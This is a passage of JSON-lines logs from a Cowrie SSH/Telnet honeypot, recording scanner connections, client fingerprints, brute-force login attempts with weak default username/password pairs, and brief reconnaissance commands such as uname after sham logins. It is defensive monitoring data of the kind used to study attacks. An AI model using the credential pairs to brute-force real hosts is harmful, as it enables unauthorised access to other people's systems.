@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:03:11.538042Z","src_ip":"217.154.1.158","session":"88ac16c9cdb3"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:03:11.584889Z","src_ip":"217.154.1.158","session":"88ac16c9cdb3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:03:11.675637Z","src_ip":"217.154.1.158","session":"88ac16c9cdb3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:03:11.676389Z","src_ip":"217.154.1.158","session":"88ac16c9cdb3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:03:11.691689Z","src_ip":"217.154.1.158","session":"88ac16c9cdb3"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:03:11.693055Z","src_ip":"217.154.1.158","session":"88ac16c9cdb3"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":34122,"dst_ip":"1.2.3.4","dst_port":22,"session":"4582c6a4ac37","protocol":"ssh","message":"New connection: 217.154.1.158:34122 (1.2.3.4:22) [session: 4582c6a4ac37]","sensor":"my-vps","timestamp":"2025-08-26T20:03:28.886916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:03:28.887930Z","src_ip":"217.154.1.158","session":"4582c6a4ac37"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:03:28.901742Z","src_ip":"217.154.1.158","session":"4582c6a4ac37"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-26T20:03:28.945485Z","src_ip":"217.154.1.158","session":"4582c6a4ac37"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:03:29.961361Z","src_ip":"217.154.1.158","session":"4582c6a4ac37"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":40582,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a60fa8add32","protocol":"ssh","message":"New connection: 199.195.248.191:40582 (1.2.3.4:22) [session: 2a60fa8add32]","sensor":"my-vps","timestamp":"2025-08-26T20:03:44.904784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:03:44.905793Z","src_ip":"199.195.248.191","session":"2a60fa8add32"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:03:45.000415Z","src_ip":"199.195.248.191","session":"2a60fa8add32"}
{"eventid":"cowrie.login.failed","username":"cheeki","password":"M3gaP33!","message":"login attempt [cheeki/M3gaP33!] failed","sensor":"my-vps","timestamp":"2025-08-26T20:03:45.394440Z","src_ip":"199.195.248.191","session":"2a60fa8add32"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":49422,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbe11fb6275c","protocol":"ssh","message":"New connection: 217.154.1.158:49422 (1.2.3.4:22) [session: bbe11fb6275c]","sensor":"my-vps","timestamp":"2025-08-26T20:03:46.408954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:03:46.409671Z","src_ip":"217.154.1.158","session":"bbe11fb6275c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:03:46.424047Z","src_ip":"217.154.1.158","session":"bbe11fb6275c"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-26T20:03:46.467427Z","src_ip":"217.154.1.158","session":"bbe11fb6275c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:03:46.488947Z","src_ip":"199.195.248.191","session":"2a60fa8add32"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:03:47.483260Z","src_ip":"217.154.1.158","session":"bbe11fb6275c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42860,"dst_ip":"1.2.3.4","dst_port":23,"session":"f32623555653","protocol":"telnet","message":"New connection: 212.227.125.160:42860 (1.2.3.4:23) [session: f32623555653]","sensor":"my-vps","timestamp":"2025-08-26T20:04:03.862650Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":45776,"dst_ip":"1.2.3.4","dst_port":22,"session":"53020fabd4cd","protocol":"ssh","message":"New connection: 217.154.1.158:45776 (1.2.3.4:22) [session: 53020fabd4cd]","sensor":"my-vps","timestamp":"2025-08-26T20:04:03.917968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:04:03.919032Z","src_ip":"217.154.1.158","session":"53020fabd4cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:04:03.935199Z","src_ip":"217.154.1.158","session":"53020fabd4cd"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:04:03.948143Z","src_ip":"212.227.125.160","session":"f32623555653"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:04:04.016842Z","src_ip":"212.227.125.160","session":"f32623555653"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T20:04:04.018017Z","src_ip":"212.227.125.160","session":"f32623555653"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T20:04:04.018803Z","src_ip":"212.227.125.160","session":"f32623555653"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink123","message":"login attempt [flink/flink123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:04:04.047241Z","src_ip":"217.154.1.158","session":"53020fabd4cd"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:04:05.063213Z","src_ip":"217.154.1.158","session":"53020fabd4cd"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":33318,"dst_ip":"1.2.3.4","dst_port":22,"session":"096d7f4721f0","protocol":"ssh","message":"New connection: 45.88.8.186:33318 (1.2.3.4:22) [session: 096d7f4721f0]","sensor":"my-vps","timestamp":"2025-08-26T20:04:06.657557Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:04:07.209898Z","src_ip":"45.88.8.186","session":"096d7f4721f0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:04:07.210703Z","src_ip":"45.88.8.186","session":"096d7f4721f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42730,"dst_ip":"1.2.3.4","dst_port":23,"session":"d8c11bea1593","protocol":"telnet","message":"New connection: 212.227.235.229:42730 (1.2.3.4:23) [session: d8c11bea1593]","sensor":"my-vps","timestamp":"2025-08-26T20:04:07.447228Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T20:04:07.653356Z","src_ip":"212.227.235.229","session":"d8c11bea1593"}
{"eventid":"cowrie.login.success","username":"root","password":"616161","message":"login attempt [root/616161] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:04:09.608241Z","src_ip":"45.88.8.186","session":"096d7f4721f0"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:04:10.242382Z","src_ip":"45.88.8.186","session":"096d7f4721f0"}
{"eventid":"cowrie.session.closed","duration":2.959383487701416,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:04:10.406494Z","src_ip":"212.227.235.229","session":"d8c11bea1593"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42738,"dst_ip":"1.2.3.4","dst_port":23,"session":"ad9145d75380","protocol":"telnet","message":"New connection: 212.227.235.229:42738 (1.2.3.4:23) [session: ad9145d75380]","sensor":"my-vps","timestamp":"2025-08-26T20:04:10.490152Z"}
{"eventid":"cowrie.session.closed","duration":5.09691596031189,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:04:15.587005Z","src_ip":"212.227.235.229","session":"ad9145d75380"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41860,"dst_ip":"1.2.3.4","dst_port":23,"session":"ba5f0cfa56fa","protocol":"telnet","message":"New connection: 212.227.235.229:41860 (1.2.3.4:23) [session: ba5f0cfa56fa]","sensor":"my-vps","timestamp":"2025-08-26T20:04:15.674025Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:04:15.900546Z","src_ip":"212.227.235.229","session":"ba5f0cfa56fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:04:15.918835Z","src_ip":"212.227.235.229","session":"ba5f0cfa56fa"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T20:04:17.505534Z","src_ip":"212.227.235.229","session":"ba5f0cfa56fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.6","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:04:18.533499Z","src_ip":"212.227.235.229","session":"ba5f0cfa56fa"}
{"eventid":"cowrie.session.closed","duration":2.8641560077667236,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:04:18.538090Z","src_ip":"212.227.235.229","session":"ba5f0cfa56fa"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":60564,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd748bbbaf99","protocol":"ssh","message":"New connection: 217.154.1.158:60564 (1.2.3.4:22) [session: bd748bbbaf99]","sensor":"my-vps","timestamp":"2025-08-26T20:04:21.488660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:04:21.489775Z","src_ip":"217.154.1.158","session":"bd748bbbaf99"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:04:21.504084Z","src_ip":"217.154.1.158","session":"bd748bbbaf99"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-26T20:04:21.555298Z","src_ip":"217.154.1.158","session":"bd748bbbaf99"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:04:22.571478Z","src_ip":"217.154.1.158","session":"bd748bbbaf99"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":33922,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c8013e47df7","protocol":"ssh","message":"New connection: 217.154.1.158:33922 (1.2.3.4:22) [session: 6c8013e47df7]","sensor":"my-vps","timestamp":"2025-08-26T20:04:39.002284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:04:39.003482Z","src_ip":"217.154.1.158","session":"6c8013e47df7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:04:39.018759Z","src_ip":"217.154.1.158","session":"6c8013e47df7"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:04:39.063894Z","src_ip":"217.154.1.158","session":"6c8013e47df7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:04:40.083729Z","src_ip":"217.154.1.158","session":"6c8013e47df7"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":39162,"dst_ip":"1.2.3.4","dst_port":22,"session":"6435742c40de","protocol":"ssh","message":"New connection: 199.195.248.191:39162 (1.2.3.4:22) [session: 6435742c40de]","sensor":"my-vps","timestamp":"2025-08-26T20:04:48.191898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:04:48.198324Z","src_ip":"199.195.248.191","session":"6435742c40de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:04:48.285068Z","src_ip":"199.195.248.191","session":"6435742c40de"}
{"eventid":"cowrie.login.success","username":"root","password":"pass$123","message":"login attempt [root/pass$123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:04:48.650047Z","src_ip":"199.195.248.191","session":"6435742c40de"}
